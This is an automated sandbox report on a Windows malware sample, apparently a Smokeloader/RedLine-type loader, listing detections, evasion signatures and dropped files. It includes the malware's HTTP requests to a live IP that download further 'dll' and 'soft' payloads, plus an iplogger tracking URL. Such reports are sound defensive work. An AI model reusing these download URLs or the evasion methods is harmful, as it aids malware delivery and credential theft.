Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572088
MD5: 054b1e771a301c1e792397a683ed0a90
SHA1: eb209469e0b66a485b135012cf43538ceb9dc96c
SHA256: 6b2391a7841833a3524f5034b7287e55f4c8fbec8678ecf7a6040ada9c07fde1
Tags: exeuser-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe ReversingLabs: Detection: 75%
Source: file.exe Virustotal: Detection: 50%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_004035B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B53817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_04B53817
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 03:49:43 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: (PE payload hex dump omitted)
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 03:49:44 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: (PE payload hex dump omitted)
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401940
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empB
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/downloadv5
Source: file.exe, 00000000.00000002.2403940495.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/key5
Source: file.exe, 00000000.00000002.2403940495.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/keyU
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000002.2403940495.0000000000F89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download.
Source: file.exe, 00000000.00000002.2403940495.0000000000F89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download2
Source: file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadGs-
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadMsW
Source: file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadSs9
Source: file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadws
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/soft/downloadSs9
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/soft/downloadws
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2155798821.00000000059B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154673575.000000000586D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155912759.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155032478.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156925842.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156558413.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154029124.0000000005692000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2155798821.00000000059B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154673575.000000000586D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155912759.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155032478.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156925842.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156558413.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154029124.0000000005692000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2155798821.00000000059B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154673575.000000000586D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155912759.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155032478.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156925842.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156558413.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154029124.0000000005692000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.2405026187.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2403918298.0000000000EEC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1FD00 0_3_04D1FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1DF87 0_3_04D1DF87
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D29706 0_3_04D29706
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D13120 0_3_04D13120
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D122C0 0_3_04D122C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1E2C9 0_3_04D1E2C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D24AEE 0_3_04D24AEE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1AA90 0_3_04D1AA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D25219 0_3_04D25219
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D14350 0_3_04D14350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403D20 0_2_00403D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EC0 0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404F50 0_2_00404F50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410900 0_2_00410900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A306 0_2_0041A306
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB87 0_2_0040EB87
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415E19 0_2_00415E19
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EEC9 0_2_0040EEC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004156EE 0_2_004156EE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B690 0_2_0040B690
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E184 0_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100102A0 0_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAEE5A 0_2_00AAEE5A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A20315 0_2_00A20315
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099DA9C 0_2_0099DA9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099A491 0_2_0099A491
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009954B8 0_2_009954B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00991EBE 0_2_00991EBE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009390A7 0_2_009390A7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008258DC 0_2_008258DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009A10F3 0_2_009A10F3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099C618 0_2_0099C618
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B782B 0_2_008B782B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00998A27 0_2_00998A27
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00944675 0_2_00944675
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0084C79E 0_2_0084C79E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0091C7F6 0_2_0091C7F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0086FBEA 0_2_0086FBEA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0085252E 0_2_0085252E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00939B50 0_2_00939B50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099397E 0_2_0099397E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094BB62 0_2_0094BB62
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B551B7 0_2_04B551B7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5EDEE 0_2_04B5EDEE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B53F87 0_2_04B53F87
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5B8F7 0_2_04B5B8F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B551B7 0_2_04B551B7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5F130 0_2_04B5F130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B65955 0_2_04B65955
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B60B67 0_2_04B60B67
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04B5A9C7 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04D19B60 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 576
Source: file.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2175678349.0000000005831000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2175271863.00000000062A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2405026187.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2403918298.0000000000EEC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EED1DE CreateToolhelp32Snapshot,Module32First, 0_2_00EED1DE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401940
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7568
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs
Source: C:\Users\user\Desktop\file.exe Command line argument: emp 0_2_00408770
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 0_2_00408770
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe Virustotal: Detection: 50%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 576
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe
Source: file.exe Static file information: File size 1990144 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of whvqijov is bigger than: 0x100000 < 0x1b3a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whvqijov:EW;ikwniflt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1f17a6 should be: 0x1ed21e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: whvqijov
Source: file.exe Static PE information: section name: ikwniflt
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D195F7 push ecx; ret 0_3_04D1960A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D3037D push esi; ret 0_3_04D30386
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A1F7 push ecx; ret 0_2_0040A20A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009BD4DA push ebp; mov dword ptr [esp], ebx 0_2_009BD513
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A710F0 push 00E9BCD2h; mov dword ptr [esp], edi 0_2_00A7115D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1FCC0 push ecx; mov dword ptr [esp], 5FEE3031h 0_2_00A1FCE5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1FCC0 push 753D2A01h; mov dword ptr [esp], edx 0_2_00A1FD0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A08CC2 push eax; mov dword ptr [esp], ecx 0_2_00A08CC6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3ECD9 push 46A0A31Ah; mov dword ptr [esp], edx 0_2_00A3ED2F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C9017 push 612015EEh; mov dword ptr [esp], esp 0_2_009C908E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push eax; mov dword ptr [esp], ebp 0_2_00A11842
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push edx; mov dword ptr [esp], 5C6F12ACh 0_2_00A1185A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push 4D6D5E35h; mov dword ptr [esp], edx 0_2_00A118BA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A11835 push 0A243F34h; mov dword ptr [esp], ecx 0_2_00A118DD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FA837 push ebp; mov dword ptr [esp], ecx 0_2_009FA87D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A69811 push esi; mov dword ptr [esp], edx 0_2_00A6984B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A69811 push 6DAA56D2h; mov dword ptr [esp], edi 0_2_00A69893
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A69811 push esi; mov dword ptr [esp], 2D5C0F00h 0_2_00A698AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3781C push 2FCDD974h; mov dword ptr [esp], edi 0_2_00A37824
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3781C push ecx; mov dword ptr [esp], esp 0_2_00A37844
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2C874 push 558CEE53h; mov dword ptr [esp], edx 0_2_00A2C8AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2C874 push edi; mov dword ptr [esp], esp 0_2_00A2C8B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2C874 push eax; mov dword ptr [esp], edi 0_2_00A2C937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A70C7F push esi; mov dword ptr [esp], ecx 0_2_00A70CA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A70C7F push esi; mov dword ptr [esp], edx 0_2_00A70D0A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A33442 push ecx; mov dword ptr [esp], ebx 0_2_00A334B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A50451 push esi; mov dword ptr [esp], 62A28788h 0_2_00A5049E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A50451 push 018739BAh; mov dword ptr [esp], edx 0_2_00A50526
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A50451 push ecx; mov dword ptr [esp], esi 0_2_00A5054B
Source: file.exe Static PE information: section name: whvqijov entropy: 7.941395599436267
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
